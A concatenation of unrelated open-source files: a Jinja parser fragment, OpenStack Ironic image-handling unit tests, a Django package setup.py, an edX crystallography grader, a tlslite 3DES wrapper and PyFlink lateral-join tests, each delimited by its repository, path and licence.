self.fail('You cannot chain multiple tests with is')
args = [self.parse_expression()]
else:
args = []
node = nodes.Test(node, name, args, kwargs, dyn_args,
dyn_kwargs, lineno=token.lineno)
if negated:
node = nodes.Not(node, lineno=token.lineno)
return node
def subparse(self, end_tokens=None):
body = []
data_buffer = []
add_data = data_buffer.append
if end_tokens is not None:
self._end_token_stack.append(end_tokens)
def flush_data():
if data_buffer:
lineno = data_buffer[0].lineno
body.append(nodes.Output(data_buffer[:], lineno=lineno))
del data_buffer[:]
try:
while self.stream:
token = self.stream.current
if token.type == 'data':
if token.value:
add_data(nodes.TemplateData(token.value,
lineno=token.lineno))
next(self.stream)
elif token.type == 'variable_begin':
next(self.stream)
add_data(self.parse_tuple(with_condexpr=True))
self.stream.expect('variable_end')
elif token.type == 'block_begin':
flush_data()
next(self.stream)
if end_tokens is not None and \
self.stream.current.test_any(*end_tokens):
return body
rv = self.parse_statement()
if isinstance(rv, list):
body.extend(rv)
else:
body.append(rv)
self.stream.expect('block_end')
else:
raise AssertionError('internal parsing error')
flush_data()
finally:
if end_tokens is not None:
self._end_token_stack.pop()
return body
def parse(self):
"""Parse the whole template into a `Template` node."""
result = nodes.Template(self.subparse(), lineno=1)
result.set_environment(self.environment)
return result
| apache-2.0 |
Tehsmash/ironic | ironic/tests/test_images.py | 1 | 20411 | # Vim: tabstop=4 shiftwidth=4 softtabstop=4
# coding=utf-8
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import mock
from oslo.concurrency import processutils
from oslo.config import cfg
import six.moves.builtins as __builtin__
from ironic.common import exception
from ironic.common import image_service
from ironic.common import images
from ironic.common import utils
from ironic.openstack.common import imageutils
from ironic.tests import base
CONF = cfg.CONF
class IronicImagesTestCase(base.TestCase):
class FakeImgInfo(object):
pass
@mock.patch.object(imageutils, 'QemuImgInfo')
@mock.patch.object(os.path, 'exists', return_value=False)
def test_qemu_img_info_path_doesnt_exist(self, path_exists_mock,
qemu_img_info_mock):
images.qemu_img_info('noimg')
path_exists_mock.assert_called_once_with('noimg')
qemu_img_info_mock.assert_called_once_with()
@mock.patch.object(utils, 'execute', return_value=('out', 'err'))
@mock.patch.object(imageutils, 'QemuImgInfo')
@mock.patch.object(os.path, 'exists', return_value=True)
def test_qemu_img_info_path_exists(self, path_exists_mock,
qemu_img_info_mock, execute_mock):
images.qemu_img_info('img')
path_exists_mock.assert_called_once_with('img')
execute_mock.assert_called_once_with('env', 'LC_ALL=C', 'LANG=C',
'qemu-img', 'info', 'img')
qemu_img_info_mock.assert_called_once_with('out')
@mock.patch.object(utils, 'execute')
def test_convert_image(self, execute_mock):
images.convert_image('source', 'dest', 'out_format')
execute_mock.assert_called_once_with('qemu-img', 'convert', '-O',
'out_format', 'source', 'dest',
run_as_root=False)
@mock.patch.object(image_service, 'Service')
@mock.patch.object(__builtin__, 'open')
def test_fetch_no_image_service(self, open_mock, image_service_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'file'
open_mock.return_value = mock_file_handle
images.fetch('context', 'image_href', 'path')
open_mock.assert_called_once_with('path', 'wb')
image_service_mock.assert_called_once_with(version=1,
context='context')
image_service_mock.return_value.download.assert_called_once_with(
'image_href', 'file')
@mock.patch.object(__builtin__, 'open')
def test_fetch_image_service(self, open_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'file'
open_mock.return_value = mock_file_handle
image_service_mock = mock.Mock()
images.fetch('context', 'image_href', 'path', image_service_mock)
open_mock.assert_called_once_with('path', 'wb')
image_service_mock.download.assert_called_once_with(
'image_href', 'file')
@mock.patch.object(images, 'image_to_raw')
@mock.patch.object(__builtin__, 'open')
def test_fetch_image_service_force_raw(self, open_mock, image_to_raw_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'file'
open_mock.return_value = mock_file_handle
image_service_mock = mock.Mock()
images.fetch('context', 'image_href', 'path', image_service_mock,
force_raw=True)
open_mock.assert_called_once_with('path', 'wb')
image_service_mock.download.assert_called_once_with(
'image_href', 'file')
image_to_raw_mock.assert_called_once_with(
'image_href', 'path', 'path.part')
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw_no_file_format(self, qemu_img_info_mock):
info = self.FakeImgInfo()
info.file_format = None
qemu_img_info_mock.return_value = info
e = self.assertRaises(exception.ImageUnacceptable, images.image_to_raw,
'image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_called_once_with('path_tmp')
self.assertIn("'qemu-img info' parsing failed.", str(e))
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw_backing_file_present(self, qemu_img_info_mock):
info = self.FakeImgInfo()
info.file_format = 'raw'
info.backing_file = 'backing_file'
qemu_img_info_mock.return_value = info
e = self.assertRaises(exception.ImageUnacceptable, images.image_to_raw,
'image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_called_once_with('path_tmp')
self.assertIn("fmt=raw backed by: backing_file", str(e))
@mock.patch.object(os, 'rename')
@mock.patch.object(os, 'unlink')
@mock.patch.object(images, 'convert_image')
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw(self, qemu_img_info_mock, convert_image_mock,
unlink_mock, rename_mock):
CONF.set_override('force_raw_images', True)
info = self.FakeImgInfo()
info.file_format = 'fmt'
info.backing_file = None
qemu_img_info_mock.return_value = info
def convert_side_effect(source, dest, out_format):
info.file_format = 'raw'
convert_image_mock.side_effect = convert_side_effect
images.image_to_raw('image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_has_calls([mock.call('path_tmp'),
mock.call('path.converted')])
convert_image_mock.assert_called_once_with('path_tmp',
'path.converted', 'raw')
unlink_mock.assert_called_once_with('path_tmp')
rename_mock.assert_called_once_with('path.converted', 'path')
@mock.patch.object(os, 'unlink')
@mock.patch.object(images, 'convert_image')
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw_not_raw_after_conversion(self, qemu_img_info_mock,
convert_image_mock,
unlink_mock):
CONF.set_override('force_raw_images', True)
info = self.FakeImgInfo()
info.file_format = 'fmt'
info.backing_file = None
qemu_img_info_mock.return_value = info
self.assertRaises(exception.ImageConvertFailed, images.image_to_raw,
'image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_has_calls([mock.call('path_tmp'),
mock.call('path.converted')])
convert_image_mock.assert_called_once_with('path_tmp',
'path.converted', 'raw')
unlink_mock.assert_called_once_with('path_tmp')
@mock.patch.object(os, 'rename')
@mock.patch.object(images, 'qemu_img_info')
def test_image_to_raw_already_raw_format(self, qemu_img_info_mock,
rename_mock):
info = self.FakeImgInfo()
info.file_format = 'raw'
info.backing_file = None
qemu_img_info_mock.return_value = info
images.image_to_raw('image_href', 'path', 'path_tmp')
qemu_img_info_mock.assert_called_once_with('path_tmp')
rename_mock.assert_called_once_with('path_tmp', 'path')
@mock.patch.object(image_service, 'Service')
def test_download_size_no_image_service(self, image_service_mock):
images.download_size('context', 'image_href')
image_service_mock.assert_called_once_with(version=1,
context='context')
image_service_mock.return_value.show.assert_called_once_with(
'image_href')
def test_download_size_image_service(self):
image_service_mock = mock.MagicMock()
images.download_size('context', 'image_href', image_service_mock)
image_service_mock.show.assert_called_once_with('image_href')
@mock.patch.object(images, 'qemu_img_info')
def test_converted_size(self, qemu_img_info_mock):
info = self.FakeImgInfo()
info.virtual_size = 1
qemu_img_info_mock.return_value = info
size = images.converted_size('path')
qemu_img_info_mock.assert_called_once_with('path')
self.assertEqual(1, size)
class FsImageTestCase(base.TestCase):
@mock.patch.object(shutil, 'copyfile')
@mock.patch.object(os, 'makedirs')
@mock.patch.object(os.path, 'dirname')
@mock.patch.object(os.path, 'exists')
def test__create_root_fs(self, path_exists_mock,
dirname_mock, mkdir_mock, cp_mock):
path_exists_mock_func = lambda path: path == 'root_dir'
files_info = {
'a1': 'b1',
'a2': 'b2',
'a3': 'sub_dir/b3'}
path_exists_mock.side_effect = path_exists_mock_func
dirname_mock.side_effect = ['root_dir', 'root_dir',
'root_dir/sub_dir', 'root_dir/sub_dir']
images._create_root_fs('root_dir', files_info)
cp_mock.assert_any_call('a1', 'root_dir/b1')
cp_mock.assert_any_call('a2', 'root_dir/b2')
cp_mock.assert_any_call('a3', 'root_dir/sub_dir/b3')
path_exists_mock.assert_any_call('root_dir/sub_dir')
dirname_mock.assert_any_call('root_dir/b1')
dirname_mock.assert_any_call('root_dir/b2')
dirname_mock.assert_any_call('root_dir/sub_dir/b3')
mkdir_mock.assert_called_once_with('root_dir/sub_dir')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'write_to_file')
@mock.patch.object(utils, 'dd')
@mock.patch.object(utils, 'umount')
@mock.patch.object(utils, 'mount')
@mock.patch.object(utils, 'mkfs')
def test_create_vfat_image(self, mkfs_mock, mount_mock, umount_mock,
dd_mock, write_mock, tempdir_mock, create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tempdir'
tempdir_mock.return_value = mock_file_handle
parameters = {'p1': 'v1'}
files_info = {'a': 'b'}
images.create_vfat_image('tgt_file', parameters=parameters,
files_info=files_info, parameters_file='qwe',
fs_size_kib=1000)
dd_mock.assert_called_once_with('/dev/zero',
'tgt_file',
'count=1',
'bs=1000KiB')
mkfs_mock.assert_called_once_with('vfat', 'tgt_file')
mount_mock.assert_called_once_with('tgt_file', 'tempdir',
'-o', 'umask=0')
parameters_file_path = os.path.join('tempdir', 'qwe')
write_mock.assert_called_once_with(parameters_file_path, 'p1=v1')
create_root_fs_mock.assert_called_once_with('tempdir', files_info)
umount_mock.assert_called_once_with('tempdir')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'dd')
@mock.patch.object(utils, 'umount')
@mock.patch.object(utils, 'mount')
@mock.patch.object(utils, 'mkfs')
def test_create_vfat_image_always_umount(self, mkfs_mock, mount_mock,
umount_mock, dd_mock, tempdir_mock, create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tempdir'
tempdir_mock.return_value = mock_file_handle
files_info = {'a': 'b'}
create_root_fs_mock.side_effect = OSError()
self.assertRaises(exception.ImageCreationFailed,
images.create_vfat_image, 'tgt_file',
files_info=files_info)
umount_mock.assert_called_once_with('tempdir')
@mock.patch.object(utils, 'dd')
def test_create_vfat_image_dd_fails(self, dd_mock):
dd_mock.side_effect = processutils.ProcessExecutionError
self.assertRaises(exception.ImageCreationFailed,
images.create_vfat_image, 'tgt_file')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'dd')
@mock.patch.object(utils, 'mkfs')
def test_create_vfat_image_mkfs_fails(self, mkfs_mock, dd_mock,
tempdir_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tempdir'
tempdir_mock.return_value = mock_file_handle
mkfs_mock.side_effect = processutils.ProcessExecutionError
self.assertRaises(exception.ImageCreationFailed,
images.create_vfat_image, 'tgt_file')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'dd')
@mock.patch.object(utils, 'umount')
@mock.patch.object(utils, 'mount')
@mock.patch.object(utils, 'mkfs')
def test_create_vfat_image_umount_fails(self, mkfs_mock, mount_mock,
umount_mock, dd_mock, tempdir_mock, create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tempdir'
tempdir_mock.return_value = mock_file_handle
umount_mock.side_effect = processutils.ProcessExecutionError
self.assertRaises(exception.ImageCreationFailed,
images.create_vfat_image, 'tgt_file')
def test__generate_isolinux_cfg(self):
kernel_params = ['key1=value1', 'key2']
expected_cfg = ("default boot\n"
"\n"
"label boot\n"
"kernel /vmlinuz\n"
"append initrd=/initrd text key1=value1 key2 --")
cfg = images._generate_isolinux_cfg(kernel_params)
self.assertEqual(expected_cfg, cfg)
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'write_to_file')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'execute')
@mock.patch.object(images, '_generate_isolinux_cfg')
def test_create_isolinux_image(self, gen_cfg_mock, utils_mock,
tempdir_mock, write_to_file_mock,
create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tmpdir'
tempdir_mock.return_value = mock_file_handle
cfg = "cfg"
cfg_file = 'tmpdir/isolinux/isolinux.cfg'
gen_cfg_mock.return_value = cfg
params = ['a=b', 'c']
images.create_isolinux_image('tgt_file', 'path/to/kernel',
'path/to/ramdisk', kernel_params=params)
files_info = {
'path/to/kernel': 'vmlinuz',
'path/to/ramdisk': 'initrd',
CONF.isolinux_bin: 'isolinux/isolinux.bin'
}
create_root_fs_mock.assert_called_once_with('tmpdir', files_info)
gen_cfg_mock.assert_called_once_with(params)
write_to_file_mock.assert_called_once_with(cfg_file, cfg)
utils_mock.assert_called_once_with('mkisofs', '-r', '-V',
"BOOT IMAGE", '-cache-inodes', '-J', '-l',
'-no-emul-boot', '-boot-load-size',
'4', '-boot-info-table', '-b', 'isolinux/isolinux.bin',
'-o', 'tgt_file', 'tmpdir')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'execute')
def test_create_isolinux_image_rootfs_fails(self, utils_mock,
tempdir_mock,
create_root_fs_mock):
create_root_fs_mock.side_effect = IOError
self.assertRaises(exception.ImageCreationFailed,
images.create_isolinux_image,
'tgt_file', 'path/to/kernel',
'path/to/ramdisk')
@mock.patch.object(images, '_create_root_fs')
@mock.patch.object(utils, 'write_to_file')
@mock.patch.object(utils, 'tempdir')
@mock.patch.object(utils, 'execute')
@mock.patch.object(images, '_generate_isolinux_cfg')
def test_create_isolinux_image_mkisofs_fails(self, gen_cfg_mock,
utils_mock,
tempdir_mock,
write_to_file_mock,
create_root_fs_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tmpdir'
tempdir_mock.return_value = mock_file_handle
utils_mock.side_effect = processutils.ProcessExecutionError
self.assertRaises(exception.ImageCreationFailed,
images.create_isolinux_image,
'tgt_file', 'path/to/kernel',
'path/to/ramdisk')
@mock.patch.object(images, 'create_isolinux_image')
@mock.patch.object(images, 'fetch')
@mock.patch.object(utils, 'tempdir')
def test_create_boot_iso(self, tempdir_mock, fetch_images_mock,
create_isolinux_mock):
mock_file_handle = mock.MagicMock(spec=file)
mock_file_handle.__enter__.return_value = 'tmpdir'
tempdir_mock.return_value = mock_file_handle
images.create_boot_iso('ctx', 'output_file', 'kernel-uuid',
'ramdisk-uuid', 'root-uuid', 'kernel-params')
fetch_images_mock.assert_any_call('ctx', 'kernel-uuid',
'tmpdir/kernel-uuid', True)
fetch_images_mock.assert_any_call('ctx', 'ramdisk-uuid',
'tmpdir/ramdisk-uuid', True)
params = ['root=UUID=root-uuid', 'kernel-params']
create_isolinux_mock.assert_called_once_with('output_file',
'tmpdir/kernel-uuid', 'tmpdir/ramdisk-uuid', params)
@mock.patch.object(image_service, 'Service')
def test_get_glance_image_property(self, image_service_mock):
prop_dict = {'properties': {'prop1': 'val1'}}
image_service_obj_mock = image_service_mock.return_value
image_service_obj_mock.show.return_value = prop_dict
ret_val = images.get_glance_image_property('con', 'uuid', 'prop1')
image_service_mock.assert_called_once_with(version=1, context='con')
image_service_obj_mock.show.assert_called_once_with('uuid')
self.assertEqual('val1', ret_val)
ret_val = images.get_glance_image_property('con', 'uuid', 'prop2')
self.assertIsNone(ret_val)
@mock.patch.object(image_service, 'Service')
def test_get_temp_url_for_glance_image(self, image_service_mock):
direct_url = 'swift+http://host/v1/AUTH_xx/con/obj'
image_info = {'id': 'qwe', 'properties': {'direct_url': direct_url}}
glance_service_mock = image_service_mock.return_value
glance_service_mock.swift_temp_url.return_value = 'temp-url'
glance_service_mock.show.return_value = image_info
temp_url = images.get_temp_url_for_glance_image('context',
'glance_uuid')
glance_service_mock.show.assert_called_once_with('glance_uuid')
self.assertEqual('temp-url', temp_url)
| apache-2.0 |
mgpyh/django-fluent-comments | setup.py | 1 | 2800 | #!/usr/bin/env python
from __future__ import print_function
from setuptools import setup, find_packages
from os import path
import codecs
import os
import re
import sys
# When creating the sdist, make sure the django.mo file also exists:
if 'sdist' in sys.argv or 'develop' in sys.argv:
try:
os.chdir('fluent_comments')
# from django.core.management.commands.compilemessages import Command
# Command.compile_messages(sys.stderr)
finally:
os.chdir('..')
def read(*parts):
file_path = path.join(path.dirname(__file__), *parts)
return codecs.open(file_path, encoding='utf-8').read()
def find_version(*parts):
version_file = read(*parts)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", version_file, re.M)
if version_match:
return str(version_match.group(1))
raise RuntimeError("Unable to find version string.")
if sys.version_info[0] >= 3:
# Akismet 0.2 does not support Python 3.
install_requires=[
'django-crispy-forms>=1.1.1',
]
if 'install' in sys.argv:
print("\nwarning: skipped Akismet as dependency because it does not have a Python 3 version.")
else:
install_requires=[
'django-crispy-forms>=1.1.1',
'akismet>=0.2',
]
setup(
name='django-fluent-comments',
version=find_version('fluent_comments', '__init__.py'),
license='Apache License, Version 2.0',
install_requires=install_requires,
requires=[
'Django (>=1.3)', # Using staticfiles
],
extras_require = {
'threadedcomments': ['django-threadedcomments>=0.9'],
},
description='A modern, ajax-based appearance for django_comments',
long_description=read('README.rst'),
author='Diederik van der Boor',
author_email='[email protected]',
url='https://github.com/edoburu/django-fluent-comments',
download_url='https://github.com/edoburu/django-fluent-comments/zipball/master',
packages=find_packages(exclude=('example*',)),
include_package_data=True,
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
| apache-2.0 |
andyzsf/edx | common/lib/chem/chem/miller.py | 182 | 9162 | """ Calculation of Miller indices """
import numpy as np
import math
import fractions as fr
import decimal
import json
def lcm(a, b):
"""
Returns least common multiple of a, b
Args:
a, b: floats
Returns:
float
"""
return a * b / fr.gcd(a, b)
def segment_to_fraction(distance):
"""
Converts lengths of which the plane cuts the axes to fraction.
Tries convert distance to closest nicest fraction with denominator less or
equal than 10. It is
purely for simplicity and clearance of learning purposes. Jenny: 'In typical
courses students usually do not encounter indices any higher than 6'.
If distance is not a number (numpy nan), it means that plane is parallel to
axis or contains it. Inverted fraction to nan (nan is 1/0) = 0 / 1 is
returned
Generally (special cases):
a) if distance is smaller than some constant, i.g. 0.01011,
than fraction's denominator usually much greater than 10.
b) Also, if student will set point on 0.66 -> 1/3, so it is 333 plane,
But if he will slightly move the mouse and click on 0.65 -> it will be
(16,15,16) plane. That's why we are doing adjustments for points coordinates,
to the closest tick, tick + tick / 2 value. And now UI sends to server only
values multiple to 0.05 (half of tick). Same rounding is implemented for
unittests.
But if one will want to calculate miller indices with exact coordinates and
with nice fractions (which produce small Miller indices), he may want shift
to new origin if segments are like S = (0.015, > 0.05, >0.05) - close to zero
in one coordinate. He may update S to (0, >0.05, >0.05) and shift origin.
In this way he can receive nice small fractions. Also there is can be
degenerated case when S = (0.015, 0.012, >0.05) - if update S to (0, 0, >0.05) -
it is a line. This case should be considered separately. Small nice Miller
numbers and possibility to create very small segments can not be implemented
at same time).
Args:
distance: float distance that plane cuts on axis, it must not be 0.
Distance is multiple of 0.05.
Returns:
Inverted fraction.
0 / 1 if distance is nan
"""
if np.isnan(distance):
return fr.Fraction(0, 1)
else:
fract = fr.Fraction(distance).limit_denominator(10)
return fr.Fraction(fract.denominator, fract.numerator)
def sub_miller(segments):
'''
Calculates Miller indices from segments.
Algorithm:
1. Obtain inverted fraction from segments
2. Find common denominator of inverted fractions
3. Lead fractions to common denominator and throws denominator away.
4. Return obtained values.
Args:
List of 3 floats, meaning distances that plane cuts on x, y, z axes.
Any float not equals zero, it means that plane does not intersect origin,
i. e. shift of origin has already been done.
Returns:
String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)
'''
fracts = [segment_to_fraction(segment) for segment in segments]
common_denominator = reduce(lcm, [fract.denominator for fract in fracts])
miller_indices = ([
fract.numerator * math.fabs(common_denominator) / fract.denominator
for fract in fracts
])
return'(' + ','.join(map(str, map(decimal.Decimal, miller_indices))) + ')'
def miller(points):
"""
Calculates Miller indices from points.
Algorithm:
1. Calculate normal vector to a plane that goes trough all points.
2. Set origin.
3. Create Cartesian coordinate system (Ccs).
4. Find the lengths of segments of which the plane cuts the axes. Equation
of a line for axes: Origin + (Coordinate_vector - Origin) * parameter.
5. If plane goes trough Origin:
a) Find new random origin: find unit cube vertex, not crossed by a plane.
b) Repeat 2-4.
c) Fix signs of segments after Origin shift. This means to consider
original directions of axes. I.g.: Origin was 0,0,0 and became
new_origin. If new_origin has same Y coordinate as Origin, then segment
does not change its sign. But if new_origin has another Y coordinate than
origin (was 0, became 1), than segment has to change its sign (it now
lies on negative side of Y axis). New Origin 0 value of X or Y or Z
coordinate means that segment does not change sign, 1 value -> does
change. So new sign is (1 - 2 * new_origin): 0 -> 1, 1 -> -1
6. Run function that calculates miller indices from segments.
Args:
List of points. Each point is list of float coordinates. Order of
coordinates in point's list: x, y, z. Points are different!
Returns:
String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)
"""
N = np.cross(points[1] - points[0], points[2] - points[0])
O = np.array([0, 0, 0])
P = points[0] # point of plane
Ccs = map(np.array, [[1.0, 0, 0], [0, 1.0, 0], [0, 0, 1.0]])
segments = ([
np.dot(P - O, N) / np.dot(ort, N) if np.dot(ort, N) != 0
else np.nan for ort in Ccs
])
if any(x == 0 for x in segments): # Plane goes through origin.
vertices = [
# top:
np.array([1.0, 1.0, 1.0]),
np.array([0.0, 0.0, 1.0]),
np.array([1.0, 0.0, 1.0]),
np.array([0.0, 1.0, 1.0]),
# bottom, except 0,0,0:
np.array([1.0, 0.0, 0.0]),
np.array([0.0, 1.0, 0.0]),
np.array([1.0, 1.0, 1.0]),
]
for vertex in vertices:
if np.dot(vertex - O, N) != 0: # vertex not in plane
new_origin = vertex
break
# obtain new axes with center in new origin
X = np.array([1 - new_origin[0], new_origin[1], new_origin[2]])
Y = np.array([new_origin[0], 1 - new_origin[1], new_origin[2]])
Z = np.array([new_origin[0], new_origin[1], 1 - new_origin[2]])
new_Ccs = [X - new_origin, Y - new_origin, Z - new_origin]
segments = ([np.dot(P - new_origin, N) / np.dot(ort, N) if
np.dot(ort, N) != 0 else np.nan for ort in new_Ccs])
# fix signs of indices: 0 -> 1, 1 -> -1 (
segments = (1 - 2 * new_origin) * segments
return sub_miller(segments)
def grade(user_input, correct_answer):
'''
Grade crystallography problem.
Returns true if lattices are the same and Miller indices are same or minus
same. E.g. (2,2,2) = (2, 2, 2) or (-2, -2, -2). Because sign depends only
on student's selection of origin.
Args:
user_input, correct_answer: json. Format:
user_input: {"lattice":"sc","points":[["0.77","0.00","1.00"],
["0.78","1.00","0.00"],["0.00","1.00","0.72"]]}
correct_answer: {'miller': '(00-1)', 'lattice': 'bcc'}
"lattice" is one of: "", "sc", "bcc", "fcc"
Returns:
True or false.
'''
def negative(m):
"""
Change sign of Miller indices.
Args:
m: string with meaning of Miller indices. E.g.:
(-6,3,-6) -> (6, -3, 6)
Returns:
String with changed signs.
"""
output = ''
i = 1
while i in range(1, len(m) - 1):
if m[i] in (',', ' '):
output += m[i]
elif m[i] not in ('-', '0'):
output += '-' + m[i]
elif m[i] == '0':
output += m[i]
else:
i += 1
output += m[i]
i += 1
return '(' + output + ')'
def round0_25(point):
"""
Rounds point coordinates to closest 0.5 value.
Args:
point: list of float coordinates. Order of coordinates: x, y, z.
Returns:
list of coordinates rounded to closes 0.5 value
"""
rounded_points = []
for coord in point:
base = math.floor(coord * 10)
fractional_part = (coord * 10 - base)
aliquot0_25 = math.floor(fractional_part / 0.25)
if aliquot0_25 == 0.0:
rounded_points.append(base / 10)
if aliquot0_25 in (1.0, 2.0):
rounded_points.append(base / 10 + 0.05)
if aliquot0_25 == 3.0:
rounded_points.append(base / 10 + 0.1)
return rounded_points
user_answer = json.loads(user_input)
if user_answer['lattice'] != correct_answer['lattice']:
return False
points = [map(float, p) for p in user_answer['points']]
if len(points) < 3:
return False
# round point to closes 0.05 value
points = [round0_25(point) for point in points]
points = [np.array(point) for point in points]
# print miller(points), (correct_answer['miller'].replace(' ', ''),
# negative(correct_answer['miller']).replace(' ', ''))
if miller(points) in (correct_answer['miller'].replace(' ', ''), negative(correct_answer['miller']).replace(' ', '')):
return True
return False
| agpl-3.0 |
RockySteveJobs/python-for-android | python-build/python-libs/gdata/build/lib/gdata/tlslite/utils/OpenSSL_TripleDES.py | 359 | 1666 | """OpenSSL/M2Crypto 3DES implementation."""
from cryptomath import *
from TripleDES import *
if m2cryptoLoaded:
def new(key, mode, IV):
return OpenSSL_TripleDES(key, mode, IV)
class OpenSSL_TripleDES(TripleDES):
def __init__(self, key, mode, IV):
TripleDES.__init__(self, key, mode, IV, "openssl")
self.key = key
self.IV = IV
def _createContext(self, encrypt):
context = m2.cipher_ctx_new()
cipherType = m2.des_ede3_cbc()
m2.cipher_init(context, cipherType, self.key, self.IV, encrypt)
return context
def encrypt(self, plaintext):
TripleDES.encrypt(self, plaintext)
context = self._createContext(1)
ciphertext = m2.cipher_update(context, plaintext)
m2.cipher_ctx_free(context)
self.IV = ciphertext[-self.block_size:]
return ciphertext
def decrypt(self, ciphertext):
TripleDES.decrypt(self, ciphertext)
context = self._createContext(0)
#I think M2Crypto has a bug - it fails to decrypt and return the last block passed in.
#To work around this, we append sixteen zeros to the string, below:
plaintext = m2.cipher_update(context, ciphertext+('\0'*16))
#If this bug is ever fixed, then plaintext will end up having a garbage
#plaintext block on the end. That's okay - the below code will ignore it.
plaintext = plaintext[:len(ciphertext)]
m2.cipher_ctx_free(context)
self.IV = ciphertext[-self.block_size:]
return plaintext | apache-2.0 |
apache/flink | flink-python/pyflink/table/tests/test_correlate.py | 5 | 4123 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
from pyflink.table import expressions as expr
from pyflink.testing.test_case_utils import PyFlinkStreamTableTestCase
class CorrelateTests(PyFlinkStreamTableTestCase):
def test_join_lateral(self):
t_env = self.t_env
t_env.create_java_temporary_system_function("split",
"org.apache.flink.table.legacyutils.TableFunc1")
source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"])
result = source.join_lateral("split(words) as (word)")
query_operation = result._j_table.getQueryOperation()
self.assertEqual('INNER', query_operation.getJoinType().toString())
self.assertTrue(query_operation.isCorrelated())
self.assertEqual('true', query_operation.getCondition().toString())
def test_join_lateral_with_join_predicate(self):
t_env = self.t_env
t_env.create_java_temporary_system_function("split",
"org.apache.flink.table.legacyutils.TableFunc1")
source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"])
result = source.join_lateral(expr.call('split', source.words).alias('word'),
expr.col('id') == expr.col('word'))
query_operation = result._j_table.getQueryOperation()
self.assertEqual('INNER', query_operation.getJoinType().toString())
self.assertTrue(query_operation.isCorrelated())
self.assertEqual('equals(id, word)',
query_operation.getCondition().toString())
def test_left_outer_join_lateral(self):
t_env = self.t_env
t_env.create_java_temporary_system_function("split",
"org.apache.flink.table.legacyutils.TableFunc1")
source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"])
result = source.left_outer_join_lateral(expr.call('split', source.words).alias('word'))
query_operation = result._j_table.getQueryOperation()
self.assertEqual('LEFT_OUTER', query_operation.getJoinType().toString())
self.assertTrue(query_operation.isCorrelated())
self.assertEqual('true', query_operation.getCondition().toString())
def test_left_outer_join_lateral_with_join_predicate(self):
t_env = self.t_env
t_env.create_java_temporary_system_function("split",
"org.apache.flink.table.legacyutils.TableFunc1")
source = t_env.from_elements([("1", "1#3#5#7"), ("2", "2#4#6#8")], ["id", "words"])
# only support "true" as the join predicate currently
result = source.left_outer_join_lateral(expr.call('split', source.words).alias('word'),
expr.lit(True))
query_operation = result._j_table.getQueryOperation()
self.assertEqual('LEFT_OUTER', query_operation.getJoinType().toString())
self.assertTrue(query_operation.isCorrelated())
self.assertEqual('true', query_operation.getCondition().toString())
| apache-2.0 |
peterbarkley/SurfGeckos | djangosite/snippets/migrations/0012_auto_20170917_2131.py | 1 | 2390 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-18 07:31
